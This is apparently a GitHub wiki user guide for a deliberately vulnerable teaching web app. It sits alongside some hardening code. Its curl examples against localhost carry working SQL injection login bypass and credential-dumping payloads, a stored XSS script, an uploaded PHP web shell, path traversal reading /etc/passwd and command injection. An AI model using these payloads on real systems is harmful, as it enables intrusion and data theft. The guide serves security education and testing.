User Guide - capstone-hermes/hermes-fullstack GitHub Wiki

User Guide

Overview

The Weak Website is a social posting application that allows users to create accounts, share posts, upload files, and interact with various features. This guide covers all user-facing functionality from both normal user and security testing perspectives.

🚨 Security Notice

This application intentionally contains security vulnerabilities for educational purposes.

  • Use only in isolated, controlled environments
  • Never deploy on public or production systems
  • Avoid using real personal information

User Roles and Access Levels

Anonymous Users

Capabilities:

  • View landing page and security information
  • Browse public post feed
  • Access file upload functionality
  • Register for new account
  • Login to existing account

Limitations:

  • Cannot create posts
  • Cannot access protected areas
  • No profile management

Registered Users

Capabilities:

  • All anonymous user features
  • Create and manage posts
  • Access personal dashboard
  • Upload and download files
  • Change account password
  • View user profile

Limitations:

  • Cannot access other users' private data (without exploitation)
  • No administrative functions

Admin Users

Capabilities:

  • All registered user features
  • Administrative access (if implemented)
  • Enhanced system information

Application Features

1. Landing Page (/)

Purpose: Introduction to the application and navigation hub

Features:

  • Application overview and description
  • Security warning and educational notice
  • Quick navigation to key features
  • Links to registration and login

Security Considerations:

  • Contains educational warnings about vulnerabilities
  • Safe entry point for security testing

2. User Registration (/signup)

Purpose: Create new user accounts

Required Information:

  • Email address (used as username)
  • Password (subject to weak validation)

Process:

  1. Navigate to signup page
  2. Enter email and password
  3. Submit form
  4. Account created (vulnerable to injection)

Password Requirements:

  • Minimum 6 characters, maximum 20 characters
  • Must contain uppercase, lowercase, numbers, and special characters
  • ASCII characters only (vulnerability: non-ASCII rejection)
  • Password truncated at 20 characters (vulnerability)
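The rules above, as an added example that is not code from hermes-fullstack: weakNormalizePassword() behaves like the validator the page describes (ASCII only, silent cut at 20 characters) and returns what would actually be stored, weakCollides() shows why the cut matters, and strongValidatePassword() is the hardened form. HARD_MAX_LEN of 128 is an assumption.

```javascript
// Added example, not the project's validator. Rules from the page: 6..20 chars,
// upper + lower + digit + special, ASCII only, silent truncation at 20.
const MIN_LEN = 6;
const MAX_LEN = 20;
const HARD_MAX_LEN = 128; // assumed explicit upper bound for the hardened version

// Complexity rule shared by both versions. Unicode property classes so the
// hardened version accepts non-ASCII letters and digits.
function hasRequiredClasses(pw) {
  return /\p{Lu}/u.test(pw) && /\p{Ll}/u.test(pw) && /\p{Nd}/u.test(pw) &&
         /[^\p{L}\p{N}]/u.test(pw);
}

// Weak version. Returns the password that would actually be stored, or null.
function weakNormalizePassword(pw) {
  if (typeof pw !== 'string' || /[^\x20-\x7E]/.test(pw)) return null; // non-ASCII rejected
  const stored = pw.slice(0, MAX_LEN);                                  // silent truncation
  if (stored.length < MIN_LEN || !hasRequiredClasses(stored)) return null;
  return stored;
}

// Two different passwords sharing their first 20 characters are stored identically,
// so either one logs the account in.
function weakCollides(a, b) {
  const na = weakNormalizePassword(a);
  return na !== null && na === weakNormalizePassword(b);
}

// Hardened version: length counted in code points, an explicit upper bound
// instead of a cut, control characters refused, non-ASCII allowed.
function strongValidatePassword(pw) {
  if (typeof pw !== 'string') return { ok: false, reason: 'not a string' };
  const length = [...pw].length;
  if (length < MIN_LEN) return { ok: false, reason: 'too short' };
  if (length > HARD_MAX_LEN) return { ok: false, reason: 'too long' };
  if (/\p{Cc}/u.test(pw)) return { ok: false, reason: 'control character' };
  if (!hasRequiredClasses(pw)) return { ok: false, reason: 'missing character class' };
  return { ok: true, reason: null };
}
```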

Testing Scenarios:

# Normal registration
curl -X POST http://localhost:8080/auth/signup \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]","password":"Password123!"}'

# SQL injection in email
curl -X POST http://localhost:8080/auth/signup \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]'\'',(SELECT '\''password'\'','\''admin'\''))--","password":"ignored"}'

3. User Authentication (/login)

Purpose: Authenticate existing users

Process:

  1. Enter email and password
  2. Submit credentials
  3. Receive JWT token
  4. Redirected to dashboard

Authentication Flow:

  • Credentials sent to /auth/login
  • Server validates using raw SQL (vulnerable)
  • JWT token generated with hardcoded secret
  • Token stored in browser localStorage

Security Issues:

  • SQL injection in authentication
  • Credentials logged in plain text
  • Weak JWT secret (hardcoded-secret)

Testing Examples:

# Normal login
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]","password":"password123"}'

# Authentication bypass
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\''--","password":"anything"}'
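What the raw-SQL login turns the admin'-- payload into, the parameterized form that keeps the same input as plain data, and a startup check that refuses a missing or short JWT secret (the page's hardcoded-secret is 16 bytes and fails it). This is an added example, not the project's code; the table and column names (user, email, password) are assumed.

```javascript
// Added example, not code from hermes-fullstack.
function buildVulnerableLoginQuery(email, password) {
  // Concatenation: a quote in the input closes the string literal and the rest of
  // the input becomes SQL syntax, so admin'-- comments out the password test.
  return `SELECT * FROM user WHERE email = '${email}' AND password = '${password}'`;
}

function buildParameterizedLoginQuery(email, password) {
  // MySQL-style placeholders: the driver sends the values separately from the SQL
  // text, so the same payload is only ever compared against the email column.
  return {
    sql: 'SELECT * FROM user WHERE email = ? AND password = ?',
    values: [email, password],
  };
}

const MIN_SECRET_BYTES = 32; // assumed minimum for an HS256 key

// Read the signing secret from the environment at startup and fail closed.
// `env` is passed in rather than reading process.env so the check is testable.
function requireJwtSecret(env) {
  const secret = env.JWT_SECRET;
  if (typeof secret !== 'string' || secret.length === 0) {
    throw new Error('JWT_SECRET is not set');
  }
  if (Buffer.byteLength(secret, 'utf8') < MIN_SECRET_BYTES) {
    throw new Error(`JWT_SECRET must be at least ${MIN_SECRET_BYTES} bytes`);
  }
  return secret;
}
```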

4. User Dashboard (/dashboard)

Purpose: Main interface for authenticated users

Features:

  • Post creation form
  • Recent activity summary
  • Quick navigation to other features
  • User profile information

Post Creation:

  • Text content input (no length limit)
  • No content sanitization
  • Direct storage to database
  • Immediate display in public feed

Security Testing:

# Create normal post
curl -X POST http://localhost:8080/posts/create \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{"content":"Hello world!"}'

# XSS payload in post
curl -X POST http://localhost:8080/posts/create \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{"content":"<script>alert('\''XSS'\'')</script>"}'

5. Public Feed (/feed)

Purpose: Display all user posts

Features:

  • Chronological post display
  • User attribution for each post
  • No pagination (performance issue)
  • Real-time content rendering

Security Risks:

  • Stored XSS execution
  • No content filtering
  • Raw HTML rendering

Content Display:

// Vulnerable rendering (actual code)
<div dangerouslySetInnerHTML={{ __html: post.content }} />
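The fix for the rendering above is to stop treating post.content as HTML. In React that is simply `<div>{post.content}</div>`, which escapes the text child itself; the added example below (not the project's code) shows the equivalent server-side escaping and runs the page's own XSS payload through it.

```javascript
// Added example, not code from hermes-fullstack: escape the five characters that
// change meaning in HTML so stored content is displayed as text, never parsed.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Renders one feed entry (shape taken from the GET /posts/all response on this
// page) as an HTML fragment in which every user-controlled field is escaped.
function renderPostHtml(post) {
  return `<div class="post"><strong>${escapeHtml(post.userEmail)}</strong>: ` +
         `${escapeHtml(post.content)}</div>`;
}

// Quick self-check a reviewer can run over rendered output: no raw script tag
// should survive rendering, whatever the stored content was.
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}
```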

6. File Upload System (/file-upload)

Purpose: Allow users to share files

Upload Process:

  1. Select file from local system
  2. Submit via multipart form
  3. File stored in /uploads directory
  4. Direct filesystem access available

File Handling:

  • No file type restrictions
  • No effective file size limit (cap set at 1GB)
  • Original filename preserved
  • No virus scanning

Vulnerable Endpoints:

  • /file/upload - Unrestricted upload
  • /file/download/:filename - Direct file access
  • /file/retrieve?path= - Path traversal
  • /file/execute - Command injection

Testing Examples:

# Upload PHP shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST http://localhost:8080/file/upload -F "file=@shell.php"

# Path traversal
curl "http://localhost:8080/file/retrieve?path=../../../../etc/passwd"

# Command injection
curl -X POST http://localhost:8080/file/execute \
  -H "Content-Type: application/json" \
  -d '{"command":"whoami"}'

7. Password Management (/change-password)

Purpose: Allow users to update passwords

Current Status: Permanently Disabled

Intended Process:

  1. Enter current password
  2. Enter new password
  3. Confirm new password
  4. Submit form

Implementation Issues:

  • Password change always fails (vulnerability V2.1.5)
  • No current password verification (vulnerability V2.1.6)
  • Same weak validation as registration

Testing:

curl -X POST http://localhost:8080/auth/change-password \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{"currentPassword":"old","newPassword":"new123!"}'

# Always returns error: "Password change functionality is permanently disabled"

8. Security Information (/security-info)

Purpose: Educational documentation about vulnerabilities

Content:

  • OWASP ASVS mapping
  • Vulnerability explanations
  • Educational disclaimers
  • Testing guidance

Features:

  • Static informational content
  • Safe for all users to access
  • No interactive functionality

User Workflows

New User Registration Workflow

  1. Landing Page → Navigate to application
  2. Registration → Create new account
    Email: [email protected]
    Password: SecurePass123!
    
  3. Login → Authenticate with credentials
  4. Dashboard → Access protected features
  5. Explore → Try posting, file upload, etc.

Content Creation Workflow

  1. Login → Authenticate to system
  2. Dashboard → Access post creation
  3. Create Post → Enter content (vulnerable to XSS)
  4. Submit → Store in database
  5. View Feed → See post in public feed
  6. XSS Execution → Malicious scripts run for all viewers

File Sharing Workflow

  1. File Upload Page → Navigate to upload interface
  2. Select File → Choose any file type
  3. Upload → Submit to server (no restrictions)
  4. Storage → File saved with original name
  5. Access → Direct URL access to uploaded files
  6. Exploitation → Execute uploaded web shells

Security Testing Workflow

  1. Reconnaissance → Map application features
  2. Authentication Testing → Test login/signup vulnerabilities
  3. Input Validation → Test XSS and injection points
  4. File Upload Testing → Test upload restrictions
  5. Path Traversal → Test file access controls
  6. Command Injection → Test system command execution
  7. Documentation → Record findings and impacts

API Usage Guide

Authentication API

Login

POST /auth/login
Content-Type: application/json

{
  "email": "[email protected]",
  "password": "password123"
}

# Response
{
  "token": "eyJhbGciOiJIUzI1NiIs..."
}

Registration

POST /auth/signup
Content-Type: application/json

{
  "email": "[email protected]", 
  "password": "Password123!"
}

# Response
{
  "message": "User created successfully"
}

Posts API

Create Post

POST /posts/create
Authorization: Bearer <token>
Content-Type: application/json

{
  "content": "Hello world!"
}

Get All Posts

GET /posts/all

# Response
[
  {
    "id": 1,
    "content": "Hello world!",
    "userId": 1,
    "userEmail": "[email protected]",
    "createdAt": "2024-01-01T12:00:00.000Z"
  }
]

File API

Upload File

POST /file/upload
Content-Type: multipart/form-data

file: <binary file data>

# Response
{
  "originalname": "document.pdf",
  "filename": "document.pdf", 
  "path": "uploads/document.pdf"
}

Download File

GET /file/download/:filename

# Direct file download

File Retrieval (Path Traversal)

GET /file/retrieve?path=<file_path>

# Returns file contents as text

Browser Interface Guide

Navigation Structure

Header Navigation:
├── Home (/)
├── Feed (/feed)  
├── Login (/login)
├── Signup (/signup)
└── Security Info (/security-info)

Authenticated Navigation:
├── Dashboard (/dashboard)
├── Change Password (/change-password)
└── File Upload (/file-upload)

Form Validation

Client-side Validation (Minimal)

  • Email format validation
  • Required field checking
  • Basic password length check

Server-side Validation (Intentionally Weak)

  • No input sanitization
  • Raw SQL query construction
  • No XSS protection

Error Handling

User-facing Errors

  • Generic "Invalid credentials" messages
  • Form validation errors
  • File upload status messages

Security-relevant Errors

  • SQL error details exposed
  • Stack traces in responses
  • Detailed path information
  • System configuration details

Mobile and Responsive Design

Device Support

  • Desktop: Full functionality on modern browsers
  • Tablet: Responsive layout with touch support
  • Mobile: Mobile-optimized interface

Browser Compatibility

  • Chrome 90+: Full support
  • Firefox 88+: Full support
  • Safari 14+: Full support
  • Edge 90+: Full support

Accessibility

  • Basic keyboard navigation
  • Screen reader compatibility
  • High contrast support

Data Management

User Data Storage

  • Passwords: Stored in plain text (vulnerability)
  • Email: Unique constraint enforced
  • Posts: No content filtering or sanitization
  • Files: Direct filesystem storage

Data Export/Import

  • No built-in export functionality
  • Direct database access via SQL injection
  • File system access via path traversal

Data Retention

  • No automatic cleanup
  • Manual file management required
  • Database grows without limits

Performance Considerations

Known Limitations

  • No pagination on post feed
  • Large file uploads allowed (1GB)
  • No query optimization
  • No caching mechanisms

Resource Usage

  • High memory usage for large files
  • CPU intensive for malicious uploads
  • Network bandwidth uncontrolled

Troubleshooting Common Issues

Login Problems

# Check if user exists
curl "http://localhost:8080/file/retrieve?path=../../../server/logs/app.log"

# Verify credentials via SQL injection
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT email,password,null,null FROM user--","password":"test"}'

File Upload Issues

# Check upload directory permissions
curl -X POST http://localhost:8080/file/execute \
  -H "Content-Type: application/json" \
  -d '{"command":"ls -la uploads/"}'

# Verify file was uploaded
curl "http://localhost:8080/uploads/filename.ext"

XSS Not Executing

  • Verify JavaScript is enabled
  • Check browser console for errors
  • Try different payload formats
  • Ensure content is displayed in feed

SQL Injection Not Working

  • Check quote escaping
  • Try different comment syntax (-- vs #)
  • Verify SQL syntax for MySQL
  • Check application logs for errors
